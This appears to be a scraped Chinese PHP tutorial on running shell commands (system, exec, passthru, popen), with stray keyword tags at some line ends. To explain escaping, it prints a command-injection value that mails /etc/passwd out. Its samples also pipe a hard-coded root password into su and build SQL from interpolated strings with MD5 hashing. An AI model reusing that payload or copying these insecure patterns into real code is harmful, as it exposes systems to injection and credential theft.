php高級語法總結。php
system()
輸出並返回最後一行shell結果。exec()
不輸出結果,返回最後一行shell結果,全部結果能夠保存到一個返回的數組裏面。passthru()
只調用命令,把命令的運行結果原樣地直接輸出到標準輸出設備上。相同點:均可以得到命令執行的狀態碼web
PHP提供共了3個專門的執行外部命令的函數:system(),exec(),passthru()
。 shell
system()
原型:string system (string command [, int return_var])
system()函數很其它語言中的差很少,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來獲得命令執行後的狀態碼。
例子:
複製代碼 代碼以下:segmentfault
<?php system("/usr/local/bin/webalizer/webalizer"); ?>
exec()
原型:string exec (string command [, string array [, int return_var]])
exec ()函數與system()相似,也執行給定的命令,但不輸出結果,而是返回結果的最後一行。雖然它只返回命令結果的最後一行,但用第二個參數array 能夠獲得完整的結果,方法是把結果逐行追加到array的結尾處。因此若是array不是空的,在調用以前最好用unset()最它清掉。只有指定了第二 個參數時,才能夠用第三個參數,用來取得命令執行的狀態碼。數組
<?php exec("/bin/ls -l"); exec("/bin/ls -l", $res); exec("/bin/ls -l", $res, $rc); ?>
咱們能夠exec()
這個方法獲取服務器端的IP安全
// 注意:ipconfig是Windows下的查看命令,而Linux爲ifconfig命令 exec('ifconfig -a', $arr); print_r($arr);
passthru()
原型:void passthru (string command [, int return_var])
passthru ()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標準輸出設備上。因此passthru()函數常常用來調用象pbmplus (Unix下的一個處理圖片的工具,輸出二進制的原始圖片的流)這樣的程序。一樣它也能夠獲得命令執行的狀態碼。
例子:
複製代碼 代碼以下:服務器
<?php header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?>
上面的方法只能簡單地執行命令,卻不能與命令交互。但有些時候必須向命令輸入一些東西,如在增長Linux的系統用戶時,要調用su來把當前用戶換到root才行,而su命令必需要在命令行上輸入root的密碼。這種狀況下,用上面提到的方法顯然是不行的。 網絡
popen ()
函數打開一個進程管道來執行給定的命令,返回一個文件句柄。既然返回的是一個文件句柄,那麼就能夠對它讀和寫了。在PHP3中,對這種句柄只能作單一 的操做模式,要麼寫,要麼讀;從PHP4開始,能夠同時讀和寫了。除非這個句柄是以一種模式(讀或寫)打開的,不然必須調用pclose()
函數來關閉 它。
例子1:
複製代碼 代碼以下:dom
<?php $fp=popen("/bin/ls -l", "r"); ?>
示例2:異步
<?php /* PHP中如何增長一個系統用戶 下面是一段例程,增長一個名字爲james的用戶, root密碼是 verygood。僅供參考 */ $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?>
//查找到php安裝位置 $phpcmd = exec("which php"); print_r($phpcmd); // 輸出結果 /usr/bin/php $arr = array(); $ret = exec("/bin/ls -l", $arr); print_r($ret); print_r($arr);
好比,你有一家小型的網上商店,因此能夠出售的產品列表放在一個文件中。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地 址,而後把這個產品列表發給他們。假設你沒有使用PHP的mail()
函數(或者從未據說過),你就調用Linux/Unix系統的mail程序來發送這 個文件。程序就象這樣:
複製代碼 代碼以下:
<?php system("mail $to < products.txt"); echo "咱們的產品目錄已經發送到你的信箱:$to"; ?>
用這段代碼,通常的用戶不會產生什麼危險,但實際上存在着很是大的安全漏洞。若是有個惡意的用戶輸入了這樣一個EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
那麼這條命令最終變成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信,不管哪一個網絡管理人員見到這樣的命令,都會嚇出一身冷汗來。
幸 好,PHP爲咱們提供了兩個函數:EscapeShellCmd()
和EscapeShellArg()
。函數EscapeShellCmd把一個字符串 中全部可能瞞過Shell而去執行另一個命令的字符轉義。這些字符在Shell中是有特殊含義的,象分號(),重定向(>)和從文件讀入 (<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字符串兩邊加上單引號,並把字符串中的單引號轉義,這樣這個字符串 就能夠安全地做爲命令的參數。
再來看看超時問題。若是要執行的命令要花費很長的時間,那麼應該把這個命令放到系統的後臺去運 行。但在默認狀況下,象system()等函數要等到這個命令運行完才返回(其實是要等命令的輸出結果),這確定會引發PHP腳本的超時。解決的辦法是 把命令的輸出重定向到另一個文件或流中,如:
複製代碼 代碼以下:
<?php system("/usr/local/bin/order_proc > /tmp/null &"); ?>
do_queue.php部分代碼: $phpcmd = exec("which php"); //查找到php安裝位置 $cqueue = new Queue(); $tasks = $cqueue->getQueueTask(200); foreach ($tasks as $t) { $taskphp = $t['taskphp']; $param = $t['param']; $job = $phpcmd . " " . escapeshellarg($taskphp) . " " . escapeshellarg($param); system($job); }
array getimagesize ( string $filename [, array &$imageinfo ] )
getimagesize() 函數將測定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 圖像文件的大小並返回圖像的尺寸以及文件類型和一個能夠用於普通 HTML 文件中 IMG 標記中的 height/width 文本字符串。
若是不能訪問 filename 指定的圖像或者其不是有效的圖像,getimagesize() 將返回 FALSE 併產生一條 E_WARNING 級的錯誤。
getimagesize()官方文檔說明。
示例,獲取圖片大小:
$url = "http://img2.fengniao.com/product/157/367/ce0Ar9cBeSl2A.jpg"; $ret = getimagesize($url); var_dump($ret);
打印結果:
Array ( [0] => 2100 [1] => 1280 [2] => 2 [3] => width="2100" height="1280" [bits] => 8 [channels] => 3 [mime] => image/jpeg )
<?php $size = getimagesize($filename); $fp=fopen($filename, "rb"); if ($size && $fp) { header("Content-type: {$size['mime']}"); fpassthru($fp); exit; } else { // error } ?>
//用戶修改密碼 public function modfy_password($user_password_old, $user_password_confirm, $user_name) { $state = 0; if($user_password_old && $user_password_confirm && $user_name) { $password_old = strval(md5($user_password_old)); $password_confirm = strval(md5($user_password_confirm)); $user_id = $GLOBALS['db']->getOne("select user_id from admin_user where user_name='$user_name' and password='$password_old'"); if($user_id) { /* $state = $GLOBALS['db']->query("update admin_user set password='$password_confirm' where user_id=$user_id"); if($state == true) { // 這裏須要作回滾,若是ldap密碼更新失敗,則上邊的操做也不容許密碼修改。【20170726】 $ret = $this->modify_ldap_pwd($user_name, $user_password_old, $user_password_confirm); $state = 1; //用戶密碼修改爲功 } */ // 添加事物處理 try { // 開啓事物 $GLOBALS['db']->beginTransaction(); // 更新管理平臺密碼 $state = $GLOBALS['db']->query("update admin_user set password='$password_confirm' where user_id=$user_id"); if($state != true) { throw new Exception ('更新管理平臺密碼失敗!'); } $ret = $this->modify_ldap_pwd($user_name, $user_password_old, $user_password_confirm); if(!$ret) { throw new Exception ('更新LDAP密碼失敗!'); } // 提交事物 $GLOBALS['db']->commit(); $state = 1; } catch (Exception $e) { // 回滾 $GLOBALS['db']->rollBack(); } } else { $state = -1; //用戶的原始密碼不正確 } } return $state; }
相關文章:
PHP 執行系統外部命令 system() exec() passthru()
PHP中exec與system用法區別